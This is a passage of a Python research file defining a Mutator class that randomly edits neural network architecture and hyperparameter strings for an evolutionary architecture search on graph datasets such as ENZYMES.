regularization\")\n if '--l2' in cmd_split:\n ix = cmd_split.index('--l2')\n old_l2 = cmd_split[ix+1]\n old_l2 = float(old_l2)\n if old_l2 == 0.0:\n new_l2 = np.random.uniform(0,0.001)\n else:\n new_l2 = np.random.uniform(old_l2*0.5,2*old_l2)\n print('Old L2 = %0.6f'%old_l2)\n print('New L2 = %0.6f'%new_l2)\n cmd_split[ix+1] = str(new_l2)\n else:\n cmd_split.append('--l2')\n cmd_split.append(str(round(np.random.uniform(0,0.001),4)))\n success_flag = 1\n command_string = ' '.join(cmd_split)\n \n return old_string, command_string, success_flag, None\n \n ###########################################################################################\n # This mutation alters the LR using a random uniform distribution. 
#\n ###########################################################################################\n def learning_rate_mutation(self, old_string):\n \n \n print(\"Performing Learning rate mutation\")\n augment_selector = np.random.choice(2,3)\n cmd_split = old_string.split(' ')\n \n if np.array_equal(augment_selector,[0,0,0]):\n print (\"No learning rate mutation.\")\n success_flag = 0\n \n if augment_selector[0]:\n #Change LR \n print (\"Changing Learning rate\")\n if '--starter_learning_rate' in cmd_split:\n ix = cmd_split.index('--starter_learning_rate')\n old_lr = cmd_split[ix+1]\n old_lr = float (old_lr)\n new_lr = np.random.uniform(old_lr*0.5,2*old_lr)\n print('Old LR = %0.6f'%old_lr)\n print('New LR = %0.6f'%new_lr)\n cmd_split[ix+1] = str(new_lr)\n else:\n cmd_split.append('--starter_learning_rate')\n cmd_split.append(str(round(np.random.uniform(0,1),4)))\n success_flag = 1\n \n if augment_selector[1]:\n #Change LR step\n print (\"Changing Learning rate step\")\n iter = int(cmd_split[cmd_split.index('--num_iter')+1])\n if '--learning_rate_step' in cmd_split:\n ix = cmd_split.index('--learning_rate_step') \n old_lrs = cmd_split[ix+1]\n old_lrs = int(old_lrs)\n new_lrs = int(np.random.uniform(old_lrs*0.5,2*old_lrs))\n if new_lrs>(0.9*iter):\n new_lrs = int(0.5*iter)\n print('Old LR step = %d'%old_lrs)\n print('New LR step = %d'%new_lrs)\n cmd_split[ix+1] = str(new_lrs)\n else:\n cmd_split.append('--learning_rate_step')\n cmd_split.append(str(round(np.random.randint(int(iter/2),iter))))\n success_flag = 1\n \n if augment_selector[2]:\n print (\"Changing Learning rate exponent\")\n if '--learning_rate_exp' in cmd_split:\n ix = cmd_split.index('--learning_rate_exp')\n old_lre = cmd_split[ix+1]\n old_lre = float(old_lre)\n new_lre = np.random.uniform(old_lre*0.5,1.0)\n print('Old LR exp = %0.4f'%old_lre)\n print('New LR exp = %0.4f'%new_lre)\n cmd_split[ix+1] = str(new_lre)\n else:\n cmd_split.append('--learning_rate_exp')\n cmd_split.append(str(round(np.random.uniform(0,1),4)))\n success_flag = 1\n \n command_string = ' '.join(cmd_split)\n\n \n return old_string, command_string, success_flag, None\n\n ###########################################################################################\n # This mutation alters stride, actual functioning TBD. #\n ###########################################################################################\n def stride_mutator(self, old_string):\n power = np.random.randint(5)\n #stride = 2**power\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n if '--stride' in cmd_split:\n s_ix = cmd_split.index('--stride')\n cmd_split[s_ix+1] = str(2**power)\n command_string = ' '.join(cmd_split)\n else:\n command_string= old_string + ' --stride ' + str(2**power)\n success_flag = 1\n return old_string, command_string, success_flag, None\n\n ###########################################################################################\n # Identity mutation extends the same model for a random number of extra iterations. 
#\n ###########################################################################################\n def identity_mutation(self, old_string):\n\n cmd_split = old_string.split(' ')\n ix = cmd_split.index('--num_iter')\n dataset_idx = cmd_split.index('--dataset_name')\n if 'modelnet' in cmd_split[dataset_idx+1] :\n new_iter = np.random.randint(5000,15000)\n else:\n new_iter = np.random.randint(500,2000)\n cmd_split[ix+1] = str(new_iter)\n command_string = ' '.join(cmd_split)\n success_flag = 1\n print(\"Extending previous model for %d iterations\" % new_iter )\n \n return old_string, command_string, success_flag, None\n\n ######################################################################################################################\n # This functions mutates filter size to any odd value. It is done so by adding an additional filter size #\n # flag to the command string. Changes have been made to accomodate this in run.py, experiments.py, experiments_pcd.py#\n # and network.py. #\n ######################################################################################################################\n def filter_size_mutation(self, old_string):\n print(\"Changing Filter Size\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n \n if '--filter_size' in cmd_split:\n f_ix = cmd_split.index('--filter_size')\n cmd_split[f_ix+1] = str(random.randrange(1,8,2))\n command_string = ' '.join(cmd_split)\n else:\n command_string= old_string + ' --filter_size ' + str(random.randrange(1,11,2))\n\n success_flag = 1\n return old_string, command_string, success_flag, None\n\n #########################################################################################\n # This function performs the mutation of changing the direction by randomly choosing #\n # a value for theta and phi. The range of the values are defined by the ones from the #\n # slide. 
#\n #########################################################################################\n\n def pool_mutation(self, old_string):\n \n print(\"Pooling mutation\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n pr_dict = {}\t\n \n fc_idx = get_layer_indices(arch_list, 'fc')\n gp_idx = get_layer_indices(arch_list, 'gmp')\n c_idx = get_layer_indices(arch_list, 'c') \n ec_idx = get_layer_indices(arch_list,'ec')\n coo_idx = get_layer_indices(arch_list,'coo')\n c_idx = c_idx + coo_idx + ec_idx\n rm_idx = get_layer_indices(arch_list,'rm')\n \n if (len(gp_idx)>0) and ('--pool_ratios' in cmd_split):\n pr_idx = cmd_split.index('--pool_ratios')\n pratios = cmd_split[pr_idx+1].split('_')\n n_pools = len(pratios)\n pr_dict = {key: val for key, val in zip(gp_idx,pratios)}\n else:\n n_pools = 0\n\n \n if len(rm_idx)==0:\n if len(fc_idx)>0:\n \n insert_index= fc_idx[0]\n rm_string = 'rm'\n #pool_string = 'gmp_'+ str(n_pools)\n arch_list.insert(insert_index, rm_string)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"Cannot Add Pooling(RM) Yet\")\n success_flag = 0\n command_string = old_string\n insert_index=None\n else:\n if len(c_idx) > 0:\n conv_check_idx = np.random.choice(c_idx)\n next_layer = arch_list[conv_check_idx+1].split('_')\n next_layer2 = arch_list[conv_check_idx+2].split('_')\n if next_layer[0] in ['rc0','rc1']:\n if next_layer2[0] in ['rm', 'gmp', 'p']:\n insert_index = None\n print (\"Pooling(/RM) Layer Already There\")\n else:\n insert_index = conv_check_idx+2\n print (\"Adding Pooling after RC\")\n else:\n if next_layer[0] in ['rm', 'gmp', 'p']:\n insert_index = None\n print (\"Pooling(/RM/ GEP) Layer Already There\")\n else:\n insert_index = conv_check_idx+1\n print (\"Adding Pooling after C\")\n \n if insert_index != None:\n if len(gp_idx)==0:\n gp_layer = 'gmp_'+ str(n_pools)\n arch_list.insert(insert_index,gp_layer)\n pool_ratio_value = round(np.random.uniform(0,1),2)\n pr_dict[insert_index] = pool_ratio_value\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n cmd_split = modify_cmd_list(cmd_split, '--pool_ratios', str(pool_ratio_value))\n \n else:\n gp_layer = 'gmp_'+ str(n_pools)\n arch_list.insert(insert_index,gp_layer)\n arch_list, pr_string = order_pooling(insert_index,gp_idx,arch_list,pr_dict)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n cmd_split = modify_cmd_list(cmd_split, '--pool_ratios', pr_string)\n \n \n command_string = ' '.join(cmd_split)\n success_flag = 1\n \n else:\n success_flag = 0\n command_string = old_string\n \n else:\n print('Cannot add more pooling as no convolutions present.')\n success_flag = 0\n command_string = old_string\n insert_index=None\n\n \n return old_string,command_string,success_flag, insert_index\n \n\n def pool_gep_mutation(self, old_string):\n \n print(\"Pooling (GEP) mutation\")\n command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n \n fc_idx = get_layer_indices(arch_list, 'fc')\n gp_idx = get_layer_indices(arch_list, 'gmp')\n gep_idx = get_layer_indices(arch_list, 'p')\n c_idx = get_layer_indices(arch_list, 'c')\n ec_idx = get_layer_indices(arch_list,'ec')\n coo_idx = get_layer_indices(arch_list,'coo')\n rm_idx = get_layer_indices(arch_list,'rm')\n \n c_idx = c_idx + ec_idx + coo_idx\n \n gep_layer = 'p_' + 
str(np.random.choice([4,8,16,32,64]))\n \n if len(c_idx)>0:\n \n conv_check_idx = np.random.choice(c_idx)\n next_layer = arch_list[conv_check_idx+1].split('_')\n\n \n if next_layer[0] in ['rc0','rc1']:\n if (conv_check_idx+2) < len(arch_list):\n next_layer2 = arch_list[conv_check_idx+2].split('_')\n if next_layer2[0] in ['rm', 'gmp', 'p']:\n insert_index = None\n print(\"Pooling(/RM/GEP) Layer Already There\")\n else:\n insert_index = conv_check_idx+2\n print(\"Adding GEP after RC\")\n else:\n insert_index = conv_check_idx+2\n print(\"Adding GEP after RC\")\n else:\n if next_layer[0] in ['rm', 'gmp', 'p']:\n insert_index = None\n print(\"Pooling(/RM/GEP) Layer Already There\")\n else:\n insert_index = conv_check_idx+1\n print(\"Adding GEP after C\")\n \n if insert_index != None:\n arch_list.insert(insert_index,gep_layer)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n success_flag = 0\n command_string = old_string\n \n elif len(fc_idx)>0:\n \n fc1 = fc_idx[0]\n current_layer = arch_list[fc1-1].split('_')\n if current_layer[0] == 'OC':\n print('Inserting GEP at index 1')\n insert_index = fc1\n arch_list.insert(insert_index,gep_layer)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n elif current_layer[0] in ['rm', 'gmp', 'p']:\n print(\"Pooling(/RM/GEP) Layer Already There\")\n success_flag = 0\n command_string = old_string\n insert_index=None\n else:\n print('Inserting GEP before fc1')\n insert_index = fc1\n arch_list.insert(insert_index,gep_layer)\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1 \n \n else:\n print('Cannot add more pooling as no convolutions present.')\n success_flag = 0\n command_string = old_string\n insert_index=None\n \n \n return old_string,command_string,success_flag, insert_index\n \n ##############################################################################################\n # This function performs the mutation of adding an FC layer at the end of the architecture. #\n # A variable specifying the desired output classes will be required and maybe even variables #\n # specifying stride and order. Right now the layer added would be of the type fc_400_1_2. #\n ##############################################################################################\n\n def add_fc(self, old_string):\n print(\"Add FC layer\")\n\n cmd_split = old_string.split(' ')\n dataset_name = cmd_split[cmd_split.index('--dataset_name')+1]\n output_classes = get_output_classes(dataset_name)\n \n if '--arch' not in cmd_split: #len(fc_idx)==0:\n arch_list = ['OC']\n fc_layer = make_layer_string('fc',output_classes)\n arch_list.append(fc_layer)\n insert_index = 1\n else:\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx= get_layer_indices(arch_list,'fc')\n insert_index = np.random.choice(fc_idx)\n fc_size = np.random.randint(output_classes+1,500)\n fc_layer = make_layer_string('fc', fc_size)\n arch_list.insert(insert_index,fc_layer) \n \n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n \n return old_string,command_string,success_flag,insert_index\n\n ###########################################################################################\n #Mutation to remove an FC layer. 
#\n###########################################################################################\n def remove_fc(self, old_string):\n print(\"Removing FC layer\")\n #command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list,'fc')\n fc_idx = fc_idx[:-1]\n\n if len(fc_idx)>0:\t\n remove_index = np.random.choice(fc_idx)\n print (\"Removing FC layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No Removable FC Layer present\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n ########################################################################################################\n # This mutation adds a conv layer in the architecture string. It works at all positions except # \n # for 0,12,13,14. At the exception position it does not add a convolution layer. The size of \t\t #\n # the conv layer is randomly chosen except for when it is added in between a conv and skip layer (rc0).#\n # Added lists that store layers where weights are kept the same and the layer where weights need to be #\n # initialized. #\n ########################################################################################################\n def add_conv_layer(self, old_string): \n print(\"Adding Conv layer\")\n #f_size = [128,256,512]\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list, 'fc')\n rm_idx = get_layer_indices(arch_list, 'rm')\n fc_idx = sorted(fc_idx+rm_idx)\n \n if len(fc_idx)>0:\n insert_index = np.random.choice(range(1,fc_idx[0]+1))\n else:\n insert_index = 1\n print (\"Index chosen is \" + str(insert_index))\n \n layer_string = arch_list[insert_index].split('_')\n if 'rc' in layer_string[0]:\n rc_split = layer_string[1].split('-')\n conv_filters = str(rc_split[0])\n else: \n conv_filters = np.random.choice([4,8,16,32,64,128,256,512])\n \n conv_layer= make_layer_string('c', conv_filters) \n arch_list.insert(insert_index,conv_layer)\n \n same_weights = []\n reset_weights = arch_list[insert_index]\n same_weights[1:insert_index] = arch_list[1:insert_index]\n same_weights[insert_index+1:len(same_weights)]=arch_list[insert_index+1:len(arch_list)]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n\n return old_string,command_string,success_flag,insert_index\n\n\n ###########################################################################################\n #Mutation to remove a convolution layer. 
#\n###########################################################################################\n def remove_conv(self, old_string):\n print(\"Removing Conv layer\")\n #command_string_cpy = old_string\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n c_idx = get_layer_indices(arch_list,'c')\n\n if len(c_idx)>0:\t\n remove_index = np.random.choice(c_idx)\n print (\"Removing Conv layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No Convolution Layer to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n\n ###########################################################################################\n #Mutation to remove a skip connection. #\n #rc0_128-128_1-1_1-1_1-1_1-1 ------>>>> c_128_1_1,c_128_1_1 #\n ###########################################################################################\n def remove_skip(self, old_string):\n print(\"Removing Skip connection\")\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n rc_idx= sorted(get_layer_indices(arch_list,'rc0')+ get_layer_indices(arch_list,'rc1'))\n remove_index = []\n\n if len(rc_idx)>0:\n remove_index = np.random.choice(rc_idx)\n print (\"Removing rc at \" + str(remove_index))\n rc_split = arch_list[remove_index].split('_')\n conv_num = len(rc_split[1].split('-'))\n conv_list = []\n\n for i in range(0,conv_num):\n c_size = rc_split[1].split('-')\n c_string = make_layer_string('c', c_size[i])\n conv_list.append(c_string)\n\n conv_string = ','.join(conv_list)\n arch_list[remove_index] = conv_string\n cmd_split = modify_cmd_list(cmd_split, '--arch', ','.join(arch_list))\n\n command_string = ' '.join(cmd_split) \n success_flag = 1\n \n else:\n print (\"No Skip Connection to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index=0\n \n return old_string,command_string, success_flag, remove_index\n\n ###########################################################################################\n #Mutation to add a skip connection. 
#\n #c_128_1_1,c_128_1_1 ------>>>> c_128_1-1, rc0_128-128_1-1_1-1_1-1_1-1 #\n ###########################################################################################\n\n def add_skip(self, old_string):\n print(\"Adding skip connection\")\n\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n add_idx = []\n skip_string = \"\"\n c_idx = get_layer_indices(arch_list, 'c')\n\n if len(c_idx)>1:\t\n \n insert_index = np.random.choice(c_idx)\n present_layer = arch_list[insert_index].split('_')\n next_layer = arch_list[insert_index+1].split('_')\n \n \n if next_layer[0]== 'c':\n\n skip_con = make_layer_string('rc', None ,[present_layer[1],next_layer[1]])\n arch_list.insert(insert_index+1,skip_con)\n del arch_list[insert_index+2]\n del arch_list[insert_index]\n print (\"Deleting at pos \" + str(insert_index+2))\n success_flag = 1\n \n elif next_layer[0] in ['rc0','rc1']:\n print (\"Skip Connection already present.\")\n success_flag = 0\n insert_index = 0\n else:\n \n print (\"Two consecutive convolutions not present.\")\n success_flag = 0\n insert_index = 0\n \n same_weights = []\n reset_weights = [arch_list[insert_index],arch_list[insert_index+1]]\n same_weights[1:insert_index] = arch_list[1:insert_index]\n same_weights[insert_index+2:len(arch_list)] = arch_list[insert_index+2:len(arch_list)]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n \n command_string = ' '.join(cmd_split)\n \n return old_string,command_string, success_flag, insert_index\n \n else:\n \n print (\"Cannot Add Skip Connection due to no convolutions.\")\n success_flag = 0\n insert_index = 0\n \n return old_string,old_string, success_flag, insert_index\n\n ###########################################################################################\n # This function adds a one-to-one (batchnorm and relu) identity function. 
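A 'coo' layer with a randomly chosen filter count is inserted at a random index among the convolutions. 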
#\n # #\n ###########################################################################################\n def add_one_to_one(self, old_string): \n print(\"Add one-to-one layer\")\n reset_weights = []\n same_weights = []\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list,'fc')\n rm_idx = get_layer_indices(arch_list, 'rm')\n fc_idx = sorted(fc_idx+rm_idx)\n c_idx=get_layer_indices(arch_list,'c')\n \n if (len(fc_idx)>0) and (len(c_idx)>0):\n insert_index = np.random.randint(1,np.max(c_idx)+1)\n else:\n insert_index = 1\n\n coo_filters = np.random.choice([4,8,16,32,64,128,256,512])\n coo_layer = make_layer_string('coo',coo_filters)\n arch_list.insert(insert_index,coo_layer)\n reset_weights = arch_list[insert_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n \n command_string = ' '.join(cmd_split)\n print (\"Adding One-by-One layer at \" + str(insert_index))\n success_flag = 1\n \n return old_string,command_string, success_flag, insert_index\n \n ###########################################################################################\n # This function removes one-by-one layer #\n # #\n ########################################################################################### \n\n def remove_one_to_one(self, old_string):\n print(\"Removing one-by-one layer\")\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n coo_idx = get_layer_indices(arch_list,'coo')\n\n if len(coo_idx)>0:\t\n remove_index = np.random.choice(coo_idx)\n print (\"Removing one-by-one layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No one-by-one Layer to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n ###########################################################################################\n # This function adds an attention layer #\n # #\n ###########################################################################################\n def add_attention_layer(self, old_string): \n print(\"Add attention layer\")\n reset_weights = []\n same_weights = []\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list,'fc')\n rm_idx = get_layer_indices(arch_list, 'rm')\n fc_idx = sorted(fc_idx+rm_idx)\n c_idx = get_layer_indices(arch_list,'c')\n \n if (len(fc_idx)>0) and (len(c_idx)>0):\n insert_index = np.random.randint(1,np.max(c_idx)+1)\n else:\n insert_index = 1\n\n a_filters = np.random.choice([4,8,16,32,64,128,256,512])\n a_layer = make_layer_string('a1d',a_filters) \n arch_list.insert(insert_index,a_layer)\n reset_weights = arch_list[insert_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n \n command_string = ' '.join(cmd_split)\n print (\"Adding Attention layer at \" + str(insert_index))\n success_flag = 1\n \n return old_string,command_string, success_flag, insert_index\n \n ###########################################################################################\n # This function removes attention layer #\n # #\n ########################################################################################### \n\n def remove_attention(self, old_string):\n print(\"Removing attention layer\")\n\n 
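# Hedged sketch of the intended effect (arch format taken from the get_args\n # default; 'a1d_64' assumes make_layer_string('a1d', 64) emits tag_filters):\n # '--arch OC,c_16_1_1,a1d_64,fc_10_0_0_0' --> '--arch OC,c_16_1_1,fc_10_0_0_0'\n 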
cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n a1d_idx = get_layer_indices(arch_list,'a1d')\n\n if len(a1d_idx)>0:\t\n remove_index = np.random.choice(a1d_idx)\n print (\"Removing attention layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No attention Layer to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n\n\n def add_edgeconv_layer(self, old_string): \n print(\"Adding Edge Conv layer\")\n #f_size = [128,256,512]\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list, 'fc')\n rm_idx = get_layer_indices(arch_list, 'rm')\n fc_idx = sorted(fc_idx+rm_idx)\n \n if len(fc_idx)>0:\n insert_index = np.random.choice(range(1,fc_idx[0]+1))\n else:\n insert_index = 1\n print (\"Index chosen is \" + str(insert_index))\n \n layer_string = arch_list[insert_index].split('_')\n edgeconv_filters = np.random.choice([4,8,16,32,64,128,256,512])\n \n edgeconv_layer= make_layer_string('ec', edgeconv_filters) \n arch_list.insert(insert_index,edgeconv_layer)\n \n same_weights = []\n reset_weights = arch_list[insert_index]\n same_weights[1:insert_index] = arch_list[1:insert_index]\n same_weights[insert_index+1:len(same_weights)]=arch_list[insert_index+1:len(arch_list)]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n\n return old_string,command_string,success_flag,insert_index\n \n ###########################################################################################\n # This function removes an edge conv layer #\n # #\n ########################################################################################### \n\n def remove_edgeconv(self, old_string):\n print(\"Removing Edge Conv layer\")\n \n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n ec_idx = get_layer_indices(arch_list,'ec')\n\n if len(ec_idx)>0:\t\n remove_index = np.random.choice(ec_idx)\n print (\"Removing edge conv layer at \" + str(remove_index))\n del arch_list[remove_index]\n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n\n command_string = ' '.join(cmd_split)\n success_flag = 1\n else:\n print (\"No Edge Conv Layer to Remove\")\n command_string = old_string\n success_flag = 0\n remove_index = 0\n \n return old_string,command_string,success_flag, remove_index\n\n \n \n def replace_mutation(self, old_string):\n \n print(\"Replace Mutation\")\n cmd_split = old_string.split(' ')\n arch_list = cmd_split[cmd_split.index('--arch')+1].split(',')\n fc_idx = get_layer_indices(arch_list,'fc')\n c_idx = get_layer_indices(arch_list,'c')\n ec_idx = get_layer_indices(arch_list,'ec')\n coo_idx = get_layer_indices(arch_list,'coo')\n filter_list = [4,8,16,32,64,128,256,512]\n replace_flag = 0\n \n if (len(c_idx)>0) or (len(ec_idx)>0) or (len(coo_idx)>0): \n while not replace_flag:\n type = np.random.choice(['c','ec','coo'])\n if (type == 'c') and len(c_idx)>0 :\n replace_flag = 1\n elif (type == 'ec') and len(ec_idx)>0 :\n replace_flag = 1\n elif (type == 'coo') and len(coo_idx)>0 :\n replace_flag = 1\n else:\n replace_flag = 0\n \n if (type == 'c') :\n arch_list, replace_index = replace_filter(arch_list, c_idx 
,filter_list)\n print (\"Replacing Convolution layer at \" + str(replace_index))\n elif (type == 'ec') :\n arch_list, replace_index = replace_filter(arch_list, ec_idx ,filter_list)\n print (\"Replacing Edge Convolution layer at \" + str(replace_index))\n elif (type == 'coo') :\n arch_list, replace_index = replace_filter(arch_list, coo_idx ,filter_list)\n print (\"Replacing One-by-One Convolution layer at \" + str(replace_index))\n \n cmd_split = modify_cmd_list(cmd_split,'--arch',','.join(arch_list))\n command_string = ' '.join(cmd_split)\n success_flag = 1\n \n else:\n print(\"No type of Convolutions present for replacement\")\n command_string = old_string\n success_flag = 0\n replace_index = 0\n \n return old_string,command_string,success_flag, replace_index\n\n\ndef get_mutation(path, mutation_choice):\n \n Mutator_test = Mutator(path)\n options = defaultdict(lambda: 'default', {0:Mutator.learning_rate_mutation,1:Mutator.add_fc, \\\n 2:Mutator.remove_fc , 3:Mutator.add_conv_layer, 4:Mutator.remove_conv,\\\n 5:Mutator.add_skip, 6:Mutator.remove_skip, 7:Mutator.add_edgeconv_layer, 8:Mutator.remove_edgeconv,9:Mutator.add_one_to_one,\\\n 10:Mutator.remove_one_to_one ,11: Mutator.add_attention_layer,12:Mutator.remove_attention, 13:Mutator.regularization_mutation, \\\n 14:Mutator.replace_mutation,15:Mutator.pool_mutation, 16: Mutator.pool_gep_mutation} )\n\n \n old_string,final_string,success_flag,index = options[mutation_choice](Mutator_test,path)\n \n return old_string,final_string, success_flag, index\n\ndef test_mutation(path, dataset):\n \n # Test mutation sequence\n mutation_sequence = [6,6, 20, 18,16,18,18,7,7,11,11,18,20,12,12,12,12,12]\n Mutator_test = Mutator(path)\n \n options = defaultdict(lambda: 'default', {0:Mutator.n_directions, 1:Mutator.n_neighbours,2:Mutator.agg_augment, 3:Mutator.learning_rate_mutation,\\\n 4:Mutator.identity_mutation,5:Mutator.filter_size_mutation, 6: Mutator.add_fc, 7:Mutator.add_conv_layer,\\\n 8:Mutator.remove_skip, 9:Mutator.add_skip, 10: Mutator.remove_conv, 11:Mutator.add_one_to_one,\\\n 12:Mutator.pool_mutation, 13:Mutator.add_attention_layer, 14:Mutator.remove_one_to_one, 15:Mutator.remove_attention ,\\\n 16: Mutator.pool_gep_mutation, 17:Mutator.regularization_mutation, 18:Mutator.add_edgeconv_layer, 19:Mutator.remove_edgeconv, 20:Mutator.replace_mutation} ) \n \n acc_list = []\n for mut_idx,choice in enumerate(mutation_sequence):\n # pdb.set_trace()  # debugging breakpoint (disabled)\n path = path + ' --trial_name mut'+ str(mut_idx)\n old_string,final_string,success_flag,index = options[choice](Mutator_test,path)\n print(final_string)\n old_split = old_string.split(' ')\n final_split = final_string.split(' ')\n\n if success_flag:\n acc = 0\n std = 0\n \n acc_list.append((acc,std))\n new_path = final_string.split(' ')\n del new_path[new_path.index('--trial_name')+1]\n del new_path[new_path.index('--trial_name')]\n new_path = ' '.join(new_path)\n path = new_path\n \n return acc_list, final_string\n\ndef get_args():\n \n parser = argparse.ArgumentParser(description='Process input architecture')\n parser.add_argument('--cycles', default=10, type=int, help='Specifies the total mutation cycles to undergo in current experiment.')\n parser.add_argument('--num_models', default= 5, type=int, help='Specifies the total number of models to be generated for current experiment.')\n parser.add_argument('--dataset_name', default='ENZYMES', help='Specifies the dataset for current experiment.')\n parser.add_argument('--log_path', default= './logs/', help='Specifies the file path to write individual cycle 
logs.' )\n parser.add_argument('--result_path', default= './results/', help='Specifies the file path to write final results of experiment.' )\n parser.add_argument('--load_lastcycle',default=1, type=int, help='Start experiment from last cycle.')\n parser.add_argument('--folds',default=10, type=int, help='Number of folds of Cross-validation.')\n parser.add_argument('--prob_cycle',default=1, type=int, help='Cycle at which mutation probability is changed.')\n \n \n parser.add_argument('--arch', default='OC,c_16_1_1,c_16_1_1,c_16_1_1,c_16_1_1,p_16,fc_10_0_0_0', help='Defines the model')\n parser.add_argument('--date', default='Sept02', help='Date of the model run')\n\n parser.add_argument('--train_flag', default=1, type=int,help='training flag')\n parser.add_argument('--debug_flag', default=0, type=int,help='debugging flag, if set as true will not save anything to summary writer')\n parser.add_argument('--num_iter', default=10, type=int,help='Number of iterations')\n parser.add_argument('--num_classes', default=10, type=int,help='Number of classes')\n\n parser.add_argument('--train_batch_size', default=60, type=int,help='Batch size for training')\n parser.add_argument('--test_batch_size', default=50, type=int,help='Batch size for testing')\n parser.add_argument('--snapshot_iter', default=200, type=int,help='Take snapshot each number of iterations')\n parser.add_argument('--starter_learning_rate', default=0.01, type=float,help='Starting learning rate')\n parser.add_argument('--learning_rate_step', default=1000, type=int,help='Learning rate step decay')\n parser.add_argument('--learning_rate_exp', default=0.1, type=float,help='Learning rate exponential')\n parser.add_argument('--optimizer', default='adam', help='Choose optimizer type')\n parser.add_argument('--iterations_per_test', default=4000, type=int,help='Test model by validation set each number of iterations')\n parser.add_argument('--display_iter', default=5, type=int,help='Display training info each number of iterations')\n parser.add_argument('--l2',default=0.0,type=float,help=\"L2 Regularization parameter\")\n parser.add_argument('--l1',default=0.0,type=float,help=\"L1 Regularization parameter\")\n parser.add_argument('--pool_ratios',default='1.0_1.0_1.0',help=\"Ratio of vertex reductions for each pooling\")\n parser.add_argument('--separate_batches_flag', default=0, type=int,help='Separate samples to mini batches for protein dataset')\n parser.add_argument('--cluster_alg',default='Lloyd',help='How should pooling cluster vertices?')\n parser.add_argument('--group_name',default='WACV2018',help='Experiment Directory Name')\n parser.add_argument('--trial_name',default='G3DNet18',help='Experiment Directory Name')\n parser.add_argument('--sparse',type=int,default=0,help='Use Sparse Tensors')\n\n\n args = parser.parse_args()\n \n return args, parser\n \ndef main():\n \n command_string = 'src/run_protein_test.py --dataset_name ENZYMES --num_iter 10 --num_classes 6'\n cmd_split = command_string.split(' ')\n \n args, parser = get_args()\n args_list = cmd_split[1:]\n new_args = parser.parse_args(args= args_list)\n \n acc_list, final_string = test_mutation(command_string, new_args.dataset_name)\n print(acc_list)\n print(final_string)\n \nif __name__ == \"__main__\":\n main()\n \n","sub_path":"GraphMutator.py","file_name":"GraphMutator.py","file_ext":"py","file_size_in_byte":47917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
